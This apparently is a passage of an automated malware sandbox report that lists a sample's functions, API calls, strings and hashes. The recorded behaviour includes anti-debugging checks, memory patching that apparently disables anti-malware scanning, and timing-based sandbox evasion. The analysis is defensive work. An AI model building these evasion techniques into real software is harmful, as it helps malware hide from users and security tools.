                                                                              • API String ID: 1002360270-4067648912
                                                                              • Opcode ID: b32b56df2515201832b73919104611cfdf476aef0a99e24f05488edfa362c564
                                                                              • Instruction ID: 7c147904da84b423ba6848271d6ff19755299b2b592c78e058aa73b477b14a20
                                                                              • Opcode Fuzzy Hash: b32b56df2515201832b73919104611cfdf476aef0a99e24f05488edfa362c564
                                                                              • Instruction Fuzzy Hash: 76F08171AC62146FD714AAFCBC44BFAF39CA785664F040926B914C6280DB706891DB60
                                                                              Function 0299DA24 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 33librarynativeloaderCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 13039 299da24-299da3e GetModuleHandleW 13040 299da40-299da52 GetProcAddress 13039->13040 13041 299da73-299da7b 13039->13041 13040->13041 13042 299da54-299da6d NtQueryInformationProcess 13040->13042 13042->13041 13043 299da6f 13042->13043 13043->13041
                                                                              APIs
                                                                              • GetModuleHandleW.KERNEL32(ntdll), ref: 0299DA34
                                                                              • GetProcAddress.KERNEL32(00000000,ZwQueryInformationProcess), ref: 0299DA46
                                                                              • NtQueryInformationProcess.NTDLL(FFFFFFFF,0000001F,?,00000004,?,00000000,ZwQueryInformationProcess,ntdll), ref: 0299DA65
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1338265139.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_2980000_#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: AddressHandleInformationModuleProcProcessQuery
                                                                              • String ID: ZwQueryInformationProcess$ntdll
                                                                              • API String ID: 3384173408-191046249
                                                                              • Opcode ID: 9b377f97e4dc4a70d0a1908ea7d53cda15bfc19f25c600e5fe107f01432d755b
                                                                              • Instruction ID: def9b959e3a6a1291b8ef230d767503e7a24683438fac0fca57f9f55c55b2775
                                                                              • Opcode Fuzzy Hash: 9b377f97e4dc4a70d0a1908ea7d53cda15bfc19f25c600e5fe107f01432d755b
                                                                              • Instruction Fuzzy Hash: 4BF0B470D48248BAEF10AAFC8C89BEDB7AC9B05334F144391A934A61C1D77453108B65
                                                                              Function 0299D9A4 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 32librarynativeloaderCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 13044 299d9a4-299d9be GetModuleHandleW 13045 299d9c0-299d9d2 GetProcAddress 13044->13045 13046 299d9f2-299d9fa 13044->13046 13045->13046 13047 299d9d4-299d9ec NtQueryInformationProcess 13045->13047 13047->13046 13048 299d9ee 13047->13048 13048->13046
                                                                              APIs
                                                                              • GetModuleHandleW.KERNEL32(ntdll), ref: 0299D9B4
                                                                              • GetProcAddress.KERNEL32(00000000,ZwQueryInformationProcess), ref: 0299D9C6
                                                                              • NtQueryInformationProcess.NTDLL(FFFFFFFF,00000007,?,00000004,?,00000000,ZwQueryInformationProcess,ntdll), ref: 0299D9E5
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1338265139.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_2980000_#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: AddressHandleInformationModuleProcProcessQuery
                                                                              • String ID: ZwQueryInformationProcess$ntdll
                                                                              • API String ID: 3384173408-191046249
                                                                              • Opcode ID: 013acc2fbb0b6616be4f24d06e2df4cbd4e4217f7538ace2c80913bbb1ddd8d4
                                                                              • Instruction ID: 50ff846fff74fe4d43e5a708ac47aae8f208d30c936cb01cf824dc5524ca2182
                                                                              • Opcode Fuzzy Hash: 013acc2fbb0b6616be4f24d06e2df4cbd4e4217f7538ace2c80913bbb1ddd8d4
                                                                              • Instruction Fuzzy Hash: 22F0B430C05258BDEB10B6ACCC89BECB7AC5B05334F548390A578A51C0D7745A448B61
                                                                              Function 0299D920 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 28libraryloaderCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 13049 299d920-299d93a GetModuleHandleW 13050 299d93c-299d94e GetProcAddress 13049->13050 13051 299d966-299d96e 13049->13051 13050->13051 13052 299d950-299d960 CheckRemoteDebuggerPresent 13050->13052 13052->13051 13053 299d962 13052->13053 13053->13051
                                                                              APIs
                                                                              • GetModuleHandleW.KERNEL32(KernelBase), ref: 0299D930
                                                                              • GetProcAddress.KERNEL32(00000000,CheckRemoteDebuggerPresent), ref: 0299D942
                                                                              • CheckRemoteDebuggerPresent.KERNEL32(FFFFFFFF,?,00000000,CheckRemoteDebuggerPresent,KernelBase), ref: 0299D959
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1338265139.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_2980000_#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: AddressCheckDebuggerHandleModulePresentProcRemote
                                                                              • String ID: CheckRemoteDebuggerPresent$KernelBase
                                                                              • API String ID: 35162468-539270669
                                                                              • Opcode ID: 958ad403b03c25d8da9ef61e936251191057d6128725c7d8d3b70f069ed3c4de
                                                                              • Instruction ID: adc88458c4ac690b86685298cda40ba8c209e333fdfc0da2f6341470a7c8013c
                                                                              • Opcode Fuzzy Hash: 958ad403b03c25d8da9ef61e936251191057d6128725c7d8d3b70f069ed3c4de
                                                                              • Instruction Fuzzy Hash: C1F08C30905248AEEF10B6ACC8C879CFBAD9B05378F6803D4A468B61C5E77107808761
                                                                              Function 02997942 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24librarymemorynativeCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetModuleHandleW.KERNEL32(C:\Windows\System32\ntdll.dll,NtAllocateVirtualMemory), ref: 02997951
                                                                              • GetProcAddress.KERNEL32(00000000,C:\Windows\System32\ntdll.dll), ref: 02997957
                                                                              • NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02997977
                                                                              Strings
                                                                              • C:\Windows\System32\ntdll.dll, xrefs: 0299794C
                                                                              • NtAllocateVirtualMemory, xrefs: 02997947
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1338265139.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_2980000_#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: AddressAllocateHandleMemoryModuleProcVirtual
                                                                              • String ID: C:\Windows\System32\ntdll.dll$NtAllocateVirtualMemory
                                                                              • API String ID: 421316089-2206134580
                                                                              • Opcode ID: 6fe676d7c64e2773f8de043e7243b46ec912f5f08359b0acdb3a4f0d6031de41
                                                                              • Instruction ID: 89bbe4e20f4d58b396b458f90c2d8ff6f51e044ec43f1535cc7a890db0e6f149
                                                                              • Opcode Fuzzy Hash: 6fe676d7c64e2773f8de043e7243b46ec912f5f08359b0acdb3a4f0d6031de41
                                                                              • Instruction Fuzzy Hash: 28E092B6690248BFEB00DFD8DC45EEBB79CEB48720F004411BD15C7140D670D9509BB5
                                                                              Function 02997944 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 23librarymemorynativeCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetModuleHandleW.KERNEL32(C:\Windows\System32\ntdll.dll,NtAllocateVirtualMemory), ref: 02997951
                                                                              • GetProcAddress.KERNEL32(00000000,C:\Windows\System32\ntdll.dll), ref: 02997957
                                                                              • NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02997977
                                                                              Strings
                                                                              • C:\Windows\System32\ntdll.dll, xrefs: 0299794C
                                                                              • NtAllocateVirtualMemory, xrefs: 02997947
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1338265139.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_2980000_#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: AddressAllocateHandleMemoryModuleProcVirtual
                                                                              • String ID: C:\Windows\System32\ntdll.dll$NtAllocateVirtualMemory
                                                                              • API String ID: 421316089-2206134580
                                                                              • Opcode ID: 9ef670b8e09daac3ef8eea91d85629c683a4c9d8c81a936c47a4c438fd8a61a2
                                                                              • Instruction ID: 614bb45d74d97a0595976b4568aca3887ace205472f380abae2a838b81273380
                                                                              • Opcode Fuzzy Hash: 9ef670b8e09daac3ef8eea91d85629c683a4c9d8c81a936c47a4c438fd8a61a2
                                                                              • Instruction Fuzzy Hash: 76E09AB6590248BFEB00EFD8DC45EEBB7ACEB48720F004411BE19CB240DA70E5509BB5
                                                                              Function 0299C898 Relevance: 7.6, APIs: 5, Instructions: 80nativefileCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 02984ECC: SysAllocStringLen.OLEAUT32(?,?), ref: 02984EDA
                                                                              • RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,0299C968), ref: 0299C8D3
                                                                              • NtOpenFile.N(?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000,0299C968), ref: 0299C903
                                                                              • NtQueryInformationFile.N(?,?,?,00000018,00000005,?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000), ref: 0299C918
                                                                              • NtReadFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?,00100001), ref: 0299C944
                                                                              • NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?), ref: 0299C94D
                                                                                • Part of subcall function 02984C0C: SysFreeString.OLEAUT32(0299D680), ref: 02984C1A
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1338265139.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_2980000_#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: File$PathString$AllocCloseFreeInformationNameName_OpenQueryRead
                                                                              • String ID:
                                                                              • API String ID: 1897104825-0
                                                                              • Opcode ID: 93269e72644763c80d07d60f4fc4e61f0df2612c24b5528ec72d76b62c814894
                                                                              • Instruction ID: 0190a59eeef15a5a014ef42918efaa6944466ae3ebe419e1d9c249ce0b32493e
                                                                              • Opcode Fuzzy Hash: 93269e72644763c80d07d60f4fc4e61f0df2612c24b5528ec72d76b62c814894
                                                                              • Instruction Fuzzy Hash: 9621A175A503097EEB11EAE8CC42FEEB7BDAF48B10F541461B601F71C0DAB4AA058B55
                                                                              Function 02997E14 Relevance: 7.6, APIs: 5, Instructions: 72librarynativeloaderCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • LoadLibraryExA.KERNEL32(00000000,00000000,00000000,00000000,02997F0D), ref: 02997E4C
                                                                              • GetModuleHandleA.KERNEL32(00000000,00000000,00000000,00000000,00000000,02997F0D), ref: 02997E5A
                                                                              • GetProcAddress.KERNEL32(75370000,00000000), ref: 02997E73
                                                                                • Part of subcall function 02997D4C: GetModuleHandleA.KERNEL32(kernel32,00000000,00000000,02997DD1,?,?,00000000,00000000), ref: 02997D8D
                                                                                • Part of subcall function 02997D4C: GetProcAddress.KERNEL32(00000000,kernel32), ref: 02997D93
                                                                                • Part of subcall function 02997D4C: VirtualProtect.KERNEL32(?,?,?,?,00000000,kernel32,00000000,00000000,02997DD1,?,?,00000000,00000000), ref: 02997DAD
                                                                                • Part of subcall function 02997B5C: GetModuleHandleW.KERNEL32(KernelBase,00000000,02997C60,00000000,00000000,00000000,00000000,00000000,oces,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 02997BDE
                                                                                • Part of subcall function 02997B5C: GetProcAddress.KERNEL32(00000000,KernelBase), ref: 02997BE4
                                                                                • Part of subcall function 02997B5C: GetCurrentProcess.KERNELBASE ref: 02997BEE
                                                                                • Part of subcall function 02997A94: GetModuleHandleA.KERNEL32(ntdll,00000000,00000000,02997B18,?,?,00000000), ref: 02997AD8
                                                                                • Part of subcall function 02997A94: GetProcAddress.KERNEL32(00000000,ntdll), ref: 02997ADE
                                                                                • Part of subcall function 02997A94: NtWriteVirtualMemory.NTDLL(?,?,?,?,?,00000000,ntdll,00000000,00000000,02997B18,?,?,00000000), ref: 02997AFC
                                                                              • NtFlushInstructionCache.C:\WINDOWS\SYSTEM32\NTDLL(00000000,00000000,00000000,00000000,029D7364,Function_000065E0,00000004,029D7374,85B025FF,52943FFC,00000040,029D7378,75370000,00000000,00000000,00000000), ref: 02997EE2
                                                                              • FreeLibrary.KERNEL32(75370000,00000000,00000000,00000000,00000000,029D7364,Function_000065E0,00000004,029D7374,85B025FF,52943FFC,00000040,029D7378,75370000,00000000,00000000), ref: 02997EED
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1338265139.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_2980000_#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: AddressHandleModuleProc$LibraryVirtual$CacheCurrentFlushFreeInstructionLoadMemoryProcessProtectWrite
                                                                              • String ID:
                                                                              • API String ID: 720200146-0
                                                                              • Opcode ID: 3071cf4d5260b29753eefbf65ac86310e9ca59da174886cd35f658af8edc23f6
                                                                              • Instruction ID: e0e0e06ec17085fa53dee8482707c8bc85f17d53ff92125a60f5500afcf82e45
                                                                              • Opcode Fuzzy Hash: 3071cf4d5260b29753eefbf65ac86310e9ca59da174886cd35f658af8edc23f6
                                                                              • Instruction Fuzzy Hash: A42142B0A94304ABEB14FBE8DC02FAEF7AAABC5B10F5444647604EB3C0DA3499109A54
                                                                              Function 0299D028 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 111networkCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 0299D166
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1338265139.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_2980000_#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CheckConnectionInternet
                                                                              • String ID: Initialize$OpenSession$ScanBuffer
                                                                              • API String ID: 3847983778-3852638603
                                                                              • Opcode ID: ced79bd8511bb2c7106fae8d71b265661f9b5f8ba654affc0dca71629ecaf22a
                                                                              • Instruction ID: edc90b62693d913e1c8f582fe3e2c9d18ad497353a1db215c989385a9218f7c0
                                                                              • Opcode Fuzzy Hash: ced79bd8511bb2c7106fae8d71b265661f9b5f8ba654affc0dca71629ecaf22a
                                                                              • Instruction Fuzzy Hash: B241ED31A502099FEF14FBE8C981EDEB3FAAFC9720F655426E041A7250DA75AD018F60
                                                                              Function 0299CD74 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 30sleepCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetTickCount.KERNEL32 ref: 0299CD82
                                                                              • Sleep.KERNEL32(00000000,?,0299DCF4,ScanString,029D7358,029A8D7C,OpenSession,029D7358,029A8D7C,UacScan,029D7358,029A8D7C,OpenSession,029D7358,029A8D7C,Initialize), ref: 0299CD94
                                                                              • GetTickCount.KERNEL32 ref: 0299CD99
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1338265139.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_2980000_#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CountTick$Sleep
                                                                              • String ID: 500
                                                                              • API String ID: 4250438611-612300854
                                                                              • Opcode ID: 0fbf35fe85d7ba608f2b03eca2aa7a9c0e618879dc0aa64c77324e53c2fece00
                                                                              • Instruction ID: bf378893c05d966fe53ae77b1966506a7a54e4226ff83ced781a5b67dccec524
                                                                              • Opcode Fuzzy Hash: 0fbf35fe85d7ba608f2b03eca2aa7a9c0e618879dc0aa64c77324e53c2fece00
                                                                              • Instruction Fuzzy Hash: 74C08CF96216430BCE00BEFC0CC46EB069E8FC83A2F2C2D33E017CE100C8268A122934
                                                                              Function 0299C7B2 Relevance: 6.1, APIs: 4, Instructions: 81nativefileCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 02984ECC: SysAllocStringLen.OLEAUT32(?,?), ref: 02984EDA
                                                                              • RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,0299C886), ref: 0299C7F3
                                                                              • NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0299C82D
                                                                              • NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 0299C85A
                                                                              • NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 0299C863
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1338265139.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_2980000_#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: FilePath$AllocCloseCreateNameName_StringWrite
                                                                              • String ID:
                                                                              • API String ID: 3764614163-0
                                                                              • Opcode ID: a3a7c26db474407c2432927e7ca26893eee0d77a9745200263d545226b571f71
                                                                              • Instruction ID: 4e451fcdbe1b64f2e83df2c2abc6cb6162dd84b3ef3f682ae564887d2351c414
                                                                              • Opcode Fuzzy Hash: a3a7c26db474407c2432927e7ca26893eee0d77a9745200263d545226b571f71
                                                                              • Instruction Fuzzy Hash: 4A21C071A50209BAEB20EBE4CD42FDEB7BDAF48B10F504562B600F75C0DBB46E048A65
                                                                              Function 0299C7B4 Relevance: 6.1, APIs: 4, Instructions: 80nativefileCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 02984ECC: SysAllocStringLen.OLEAUT32(?,?), ref: 02984EDA
                                                                              • RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,0299C886), ref: 0299C7F3
                                                                              • NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0299C82D
                                                                              • NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 0299C85A
                                                                              • NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 0299C863
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1338265139.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_2980000_#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: FilePath$AllocCloseCreateNameName_StringWrite
                                                                              • String ID:
                                                                              • API String ID: 3764614163-0
                                                                              • Opcode ID: d37298ed3c0e0ff3ec3fee079379856f0d9957ad35905a02f13365fcaff75671
                                                                              • Instruction ID: 71e9e23a04835d769e894a806c74218717cb5a83173c5ba0615631c5065b7544
                                                                              • Opcode Fuzzy Hash: d37298ed3c0e0ff3ec3fee079379856f0d9957ad35905a02f13365fcaff75671
                                                                              • Instruction Fuzzy Hash: FD21CF71A50309BAEF20EBE4CD42FDEB7BDAF48B10F504562B600F75C0DBB46A048A65
                                                                              Function 0299C6AC Relevance: 4.6, APIs: 3, Instructions: 74filenativeCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • RtlInitUnicodeString.N(?,?,00000000,0299C79E), ref: 0299C74C
                                                                              • RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,?,?,00000000,0299C79E), ref: 0299C762
                                                                              • NtDeleteFile.N(?,00000000,?,00000000,00000000,?,?,00000000,0299C79E), ref: 0299C781
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1338265139.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_2980000_#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Path$DeleteFileInitNameName_StringUnicode
                                                                              • String ID:
                                                                              • API String ID: 1459852867-0
                                                                              • Opcode ID: 0eafbde3354e5901ffbc88841d469de5762aba8bc9cbb937452180bce8180488
                                                                              • Instruction ID: cdf1b4e743ff8c27c2370b0e08874c739e4837fa023ad25785e3b0aa76f67c45
                                                                              • Opcode Fuzzy Hash: 0eafbde3354e5901ffbc88841d469de5762aba8bc9cbb937452180bce8180488
                                                                              • Instruction Fuzzy Hash: 392108715043897FDB02E7B48D52FCA7BBDAF4A314F1541E3D100E7092E7259A08DB64
                                                                              Function 0299C724 Relevance: 4.5, APIs: 3, Instructions: 45filenativeCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 02984ECC: SysAllocStringLen.OLEAUT32(?,?), ref: 02984EDA
                                                                              • RtlInitUnicodeString.N(?,?,00000000,0299C79E), ref: 0299C74C
                                                                              • RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,?,?,00000000,0299C79E), ref: 0299C762
                                                                              • NtDeleteFile.N(?,00000000,?,00000000,00000000,?,?,00000000,0299C79E), ref: 0299C781
                                                                                • Part of subcall function 02984C0C: SysFreeString.OLEAUT32(0299D680), ref: 02984C1A
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1338265139.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_2980000_#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: String$Path$AllocDeleteFileFreeInitNameName_Unicode
                                                                              • String ID:
                                                                              • API String ID: 1694942484-0
                                                                              • Opcode ID: 3e8c7effac4365625eed523c8ecbd48fa550ee0f71bc16f548c736b16cf9a7d0
                                                                              • Instruction ID: ab3c6765074284f8db15dff43c78ab5edebf0d196b887aa8f9cc17fac3369bd6
                                                                              • Opcode Fuzzy Hash: 3e8c7effac4365625eed523c8ecbd48fa550ee0f71bc16f548c736b16cf9a7d0
                                                                              • Instruction Fuzzy Hash: 8501EC71A40209BAEB11EAE4CD42FDEB7BDEB88710F505462A604E2580EB75AB049A64
                                                                              Function 02996D58 Relevance: 1.5, APIs: 1, Instructions: 48comCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 02996CFC: CLSIDFromProgID.OLE32(00000000,?,00000000,02996D49,?,?,?,00000000), ref: 02996D29
                                                                              • CoCreateInstance.OLE32(?,00000000,00000005,02996E3C,00000000,00000000,02996DBB,?,00000000,02996E2B), ref: 02996DA7
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1338265139.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_2980000_#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CreateFromInstanceProg
                                                                              • String ID:
                                                                              • API String ID: 2151042543-0
                                                                              • Opcode ID: dd1ed7af437c4097e4dc395b025f299e4c6234e4f9bd649dfa0e257b9b5282a7
                                                                              • Instruction ID: c8322c952b31b16316e2e6e381f8e918b34fb964fd154ebf515b6884f7730129
                                                                              • Opcode Fuzzy Hash: dd1ed7af437c4097e4dc395b025f299e4c6234e4f9bd649dfa0e257b9b5282a7
                                                                              • Instruction Fuzzy Hash: 1D01A771608704AEEB15EFA8DC52D6B7BADEBC9B20B520835F901D2690E6319910D974
                                                                              Function 0299A174 Relevance: 1.5, APIs: 1, Instructions: 17processCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 02999EF8: GetModuleHandleA.KERNEL32(kernel32.dll,00000002,0299A17F,?,?,0299A211,00000000,0299A2ED), ref: 02999F0C
                                                                                • Part of subcall function 02999EF8: GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 02999F24
                                                                                • Part of subcall function 02999EF8: GetProcAddress.KERNEL32(00000000,Heap32ListFirst), ref: 02999F36
                                                                                • Part of subcall function 02999EF8: GetProcAddress.KERNEL32(00000000,Heap32ListNext), ref: 02999F48
                                                                                • Part of subcall function 02999EF8: GetProcAddress.KERNEL32(00000000,Heap32First), ref: 02999F5A
                                                                                • Part of subcall function 02999EF8: GetProcAddress.KERNEL32(00000000,Heap32Next), ref: 02999F6C
                                                                                • Part of subcall function 02999EF8: GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory), ref: 02999F7E
                                                                                • Part of subcall function 02999EF8: GetProcAddress.KERNEL32(00000000,Process32First), ref: 02999F90
                                                                                • Part of subcall function 02999EF8: GetProcAddress.KERNEL32(00000000,Process32Next), ref: 02999FA2
                                                                                • Part of subcall function 02999EF8: GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 02999FB4
                                                                                • Part of subcall function 02999EF8: GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 02999FC6
                                                                                • Part of subcall function 02999EF8: GetProcAddress.KERNEL32(00000000,Thread32First), ref: 02999FD8
                                                                                • Part of subcall function 02999EF8: GetProcAddress.KERNEL32(00000000,Thread32Next), ref: 02999FEA
                                                                                • Part of subcall function 02999EF8: GetProcAddress.KERNEL32(00000000,Module32First), ref: 02999FFC
                                                                                • Part of subcall function 02999EF8: GetProcAddress.KERNEL32(00000000,Module32Next), ref: 0299A00E
                                                                                • Part of subcall function 02999EF8: GetProcAddress.KERNEL32(00000000,Module32FirstW), ref: 0299A020
                                                                                • Part of subcall function 02999EF8: GetProcAddress.KERNEL32(00000000,Module32NextW), ref: 0299A032
                                                                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0299A185
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1338265139.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_2980000_#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: AddressProc$CreateHandleModuleSnapshotToolhelp32
                                                                              • String ID:
                                                                              • API String ID: 2242398760-0
                                                                              • Opcode ID: 98e883a53df079a80d29c80db714be19e562ca05cad128db8ae235b0ddcebca9
                                                                              • Instruction ID: 69841fc8b8da92d3f8f7ba29d0616cfa29ef8cd60116777100ac9c108218f549
                                                                              • Opcode Fuzzy Hash: 98e883a53df079a80d29c80db714be19e562ca05cad128db8ae235b0ddcebca9
                                                                              • Instruction Fuzzy Hash: 95C08073A02524176E1066FC2FC44D3874DCD491B730408A3B509D3101D7158C115590
                                                                              Function 029A23B3 Relevance: 33.8, APIs: 2, Strings: 16, Instructions: 2315sleepprocessCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
